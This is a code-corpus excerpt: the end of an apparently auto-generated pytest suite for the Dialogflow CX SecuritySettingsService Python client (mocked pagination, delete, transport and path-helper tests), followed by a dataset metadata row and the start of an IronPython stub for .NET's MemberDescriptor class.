security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_security_settings(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, security_settings.SecuritySettings)
for i in results)
def test_list_security_settings_pages():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
pages = list(client.list_security_settings(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_security_settings_async_pager():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
async_pager = await client.list_security_settings(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, security_settings.SecuritySettings)
for i in responses)
@pytest.mark.asyncio
async def test_list_security_settings_async_pages():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
next_page_token='abc',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[],
next_page_token='def',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
],
next_page_token='ghi',
),
security_settings.ListSecuritySettingsResponse(
security_settings=[
security_settings.SecuritySettings(),
security_settings.SecuritySettings(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_security_settings(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_delete_security_settings(transport: str = 'grpc', request_type=security_settings.DeleteSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_security_settings_from_dict():
test_delete_security_settings(request_type=dict)
def test_delete_security_settings_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
client.delete_security_settings()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_delete_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.DeleteSecuritySettingsRequest):
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.DeleteSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_security_settings_async_from_dict():
await test_delete_security_settings_async(request_type=dict)
def test_delete_security_settings_field_headers():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.DeleteSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
call.return_value = None
client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_security_settings_field_headers_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = security_settings.DeleteSecuritySettingsRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_delete_security_settings_flattened():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_delete_security_settings_flattened_error():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_security_settings(
security_settings.DeleteSecuritySettingsRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_security_settings(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_delete_security_settings_flattened_error_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_security_settings(
security_settings.DeleteSecuritySettingsRequest(),
name='name_value',
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = SecuritySettingsServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = SecuritySettingsServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.SecuritySettingsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.SecuritySettingsServiceGrpcTransport,
)
def test_security_settings_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.SecuritySettingsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_security_settings_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.SecuritySettingsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'create_security_settings',
'get_security_settings',
'update_security_settings',
'list_security_settings',
'delete_security_settings',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
def test_security_settings_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.SecuritySettingsServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_security_settings_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
SecuritySettingsServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
SecuritySettingsServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_security_settings_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/dialogflow',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.SecuritySettingsServiceGrpcTransport,
transports.SecuritySettingsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_security_settings_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.SecuritySettingsServiceGrpcTransport, grpc_helpers),
(transports.SecuritySettingsServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_security_settings_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"dialogflow.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/dialogflow',
),
scopes=["1", "2"],
default_host="dialogflow.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_security_settings_service_host_no_port():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com'),
)
assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_host_with_port():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='dialogflow.googleapis.com:8000'),
)
assert client.transport._host == 'dialogflow.googleapis.com:8000'
def test_security_settings_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.SecuritySettingsServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_security_settings_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.SecuritySettingsServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.SecuritySettingsServiceGrpcTransport, transports.SecuritySettingsServiceGrpcAsyncIOTransport])
def test_security_settings_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_deidentify_template_path():
organization = "squid"
location = "clam"
deidentify_template = "whelk"
expected = "organizations/{organization}/locations/{location}/deidentifyTemplates/{deidentify_template}".format(organization=organization, location=location, deidentify_template=deidentify_template, )
actual = SecuritySettingsServiceClient.deidentify_template_path(organization, location, deidentify_template)
assert expected == actual
def test_parse_deidentify_template_path():
expected = {
"organization": "octopus",
"location": "oyster",
"deidentify_template": "nudibranch",
}
path = SecuritySettingsServiceClient.deidentify_template_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_deidentify_template_path(path)
assert expected == actual
def test_inspect_template_path():
organization = "cuttlefish"
location = "mussel"
inspect_template = "winkle"
expected = "organizations/{organization}/locations/{location}/inspectTemplates/{inspect_template}".format(organization=organization, location=location, inspect_template=inspect_template, )
actual = SecuritySettingsServiceClient.inspect_template_path(organization, location, inspect_template)
assert expected == actual
def test_parse_inspect_template_path():
expected = {
"organization": "nautilus",
"location": "scallop",
"inspect_template": "abalone",
}
path = SecuritySettingsServiceClient.inspect_template_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_inspect_template_path(path)
assert expected == actual
def test_security_settings_path():
project = "squid"
location = "clam"
security_settings = "whelk"
expected = "projects/{project}/locations/{location}/securitySettings/{security_settings}".format(project=project, location=location, security_settings=security_settings, )
actual = SecuritySettingsServiceClient.security_settings_path(project, location, security_settings)
assert expected == actual
def test_parse_security_settings_path():
expected = {
"project": "octopus",
"location": "oyster",
"security_settings": "nudibranch",
}
path = SecuritySettingsServiceClient.security_settings_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_security_settings_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "cuttlefish"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = SecuritySettingsServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "mussel",
}
path = SecuritySettingsServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "winkle"
expected = "folders/{folder}".format(folder=folder, )
actual = SecuritySettingsServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nautilus",
}
path = SecuritySettingsServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "scallop"
expected = "organizations/{organization}".format(organization=organization, )
actual = SecuritySettingsServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "abalone",
}
path = SecuritySettingsServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "squid"
expected = "projects/{project}".format(project=project, )
actual = SecuritySettingsServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "clam",
}
path = SecuritySettingsServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "whelk"
location = "octopus"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = SecuritySettingsServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "oyster",
"location": "nudibranch",
}
path = SecuritySettingsServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = SecuritySettingsServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.SecuritySettingsServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = SecuritySettingsServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = SecuritySettingsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
'grpc',
]
for transport in transports:
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| true | true |
1c3c7daceee235a0960c9e3e1d5f8a436e75eeeb | 6,587 | py | Python | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 182 | 2017-06-27T02:26:15.000Z | 2022-03-30T18:53:43.000Z | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 28 | 2017-06-27T13:38:23.000Z | 2022-03-15T11:19:44.000Z | release/stubs.min/System/ComponentModel/__init___parts/MemberDescriptor.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 67 | 2017-06-28T09:43:59.000Z | 2022-03-20T21:17:10.000Z | class MemberDescriptor(object):
""" Represents a class member,such as a property or event. This is an abstract base class. """
def CreateAttributeCollection(self,*args):
"""
CreateAttributeCollection(self: MemberDescriptor) -> AttributeCollection
Creates a collection of attributes using the array of attributes passed to the constructor.
Returns: A new System.ComponentModel.AttributeCollection that contains the
System.ComponentModel.MemberDescriptor.AttributeArray attributes.
"""
pass
def Equals(self,obj):
"""
Equals(self: MemberDescriptor,obj: object) -> bool
Compares this instance to the given object to see if they are equivalent.
obj: The object to compare to the current instance.
Returns: true if equivalent; otherwise,false.
"""
pass
def FillAttributes(self,*args):
"""
FillAttributes(self: MemberDescriptor,attributeList: IList)
When overridden in a derived class,adds the attributes of the inheriting class to the specified
list of attributes in the parent class.
attributeList: An System.Collections.IList that lists the attributes in the parent class. Initially,this is
empty.
"""
pass
def FindMethod(self,*args):
"""
FindMethod(componentClass: Type,name: str,args: Array[Type],returnType: Type,publicOnly: bool) -> MethodInfo
Finds the given method through reflection,with an option to search only public methods.
componentClass: The component that contains the method.
name: The name of the method to find.
args: An array of parameters for the method,used to choose between overloaded methods.
returnType: The type to return for the method.
publicOnly: Whether to restrict search to public methods.
Returns: A System.Reflection.MethodInfo that represents the method,or null if the method is not found.
FindMethod(componentClass: Type,name: str,args: Array[Type],returnType: Type) -> MethodInfo
Finds the given method through reflection,searching only for public methods.
componentClass: The component that contains the method.
name: The name of the method to find.
args: An array of parameters for the method,used to choose between overloaded methods.
returnType: The type to return for the method.
Returns: A System.Reflection.MethodInfo that represents the method,or null if the method is not found.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: MemberDescriptor) -> int
Returns the hash code for this instance.
Returns: A hash code for the current System.ComponentModel.MemberDescriptor.
"""
pass
def GetInvocationTarget(self,*args):
"""
GetInvocationTarget(self: MemberDescriptor,type: Type,instance: object) -> object
Retrieves the object that should be used during invocation of members.
type: The System.Type of the invocation target.
instance: The potential invocation target.
Returns: The object to be used during member invocations.
"""
pass
def GetInvokee(self,*args):
"""
GetInvokee(componentClass: Type,component: object) -> object
Gets the component on which to invoke a method.
componentClass: A System.Type representing the type of component this System.ComponentModel.MemberDescriptor is
bound to. For example,if this System.ComponentModel.MemberDescriptor describes a property,this
parameter should be the class that the property is declared on.
component: An instance of the object to call.
